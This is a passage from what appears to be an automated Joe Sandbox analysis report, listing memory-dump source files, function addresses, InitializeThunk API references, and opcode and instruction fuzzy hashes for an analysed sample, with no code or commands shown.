                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: ,-
                                                                                                                                                                                                                                    • API String ID: 0-1027024164
                                                                                                                                                                                                                                    • Opcode ID: 1e9b2c5879b7cbc52cca9a1e281d2a5f03ff3223d2b6bac2dbca510ee9dc6028
                                                                                                                                                                                                                                    • Instruction ID: 889f03f36c5e903def33978733df7f6048808d8c677619ba11a4025f70311037
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e9b2c5879b7cbc52cca9a1e281d2a5f03ff3223d2b6bac2dbca510ee9dc6028
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB2137A19163008BC7249F29CC92537B7F1EF82366F4D8618E8968B352F734CE05D7A6
                                                                                                                                                                                                                                    Function 00C80340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                    • Opcode ID: 459542b16a39f716c1acc51efbf753a7a8d4a369c2e7a3dbc5ac64c55b2610ad
                                                                                                                                                                                                                                    • Instruction ID: f3fabab3e54df9e81b489225551a3721700408b3f4ae718a35008d2ad288ffd2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 459542b16a39f716c1acc51efbf753a7a8d4a369c2e7a3dbc5ac64c55b2610ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2431E1715083048BD314EF58D8D266FBBE4EBC5328F24892DE6A987290D735D948CB9A
                                                                                                                                                                                                                                    Function 00C80460 Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                    • Opcode ID: ed4aaa18c661d40e28422755a91097da8ecc7dbbe688700dc29f5297c9686f09
                                                                                                                                                                                                                                    • Instruction ID: beb114da8026abec9efa3a3c70ed9bc155001ae2335f5288120ed8623f1a7f64
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed4aaa18c661d40e28422755a91097da8ecc7dbbe688700dc29f5297c9686f09
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A6165356083019BD754AF18C890A3FB3A2EBC5320F29C52CF9958B2A1FB30DD55D79A
                                                                                                                                                                                                                                    Function 00C7C5A0 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                    • Opcode ID: 29e06580075d088d5039c15e7f7d8c3d17107bcb3e7b48e730c50c088c141a12
                                                                                                                                                                                                                                    • Instruction ID: 23331a0b4a21a891c26a0c1ec205c679defdfa44e8bf834c0654084cf20ee15a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29e06580075d088d5039c15e7f7d8c3d17107bcb3e7b48e730c50c088c141a12
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 065158B5A083064BD72CAF28C8C072FB7D2ABD5310F19C97DE4999B395EA319D418B85
                                                                                                                                                                                                                                    Function 00C4CC7A Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367109376.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367129117.0000000000C85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367201902.0000000000CA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367306642.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367327537.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367434284.0000000000E1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367477803.0000000000E20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367495237.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367512455.0000000000E2E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367528405.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367546835.0000000000E36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
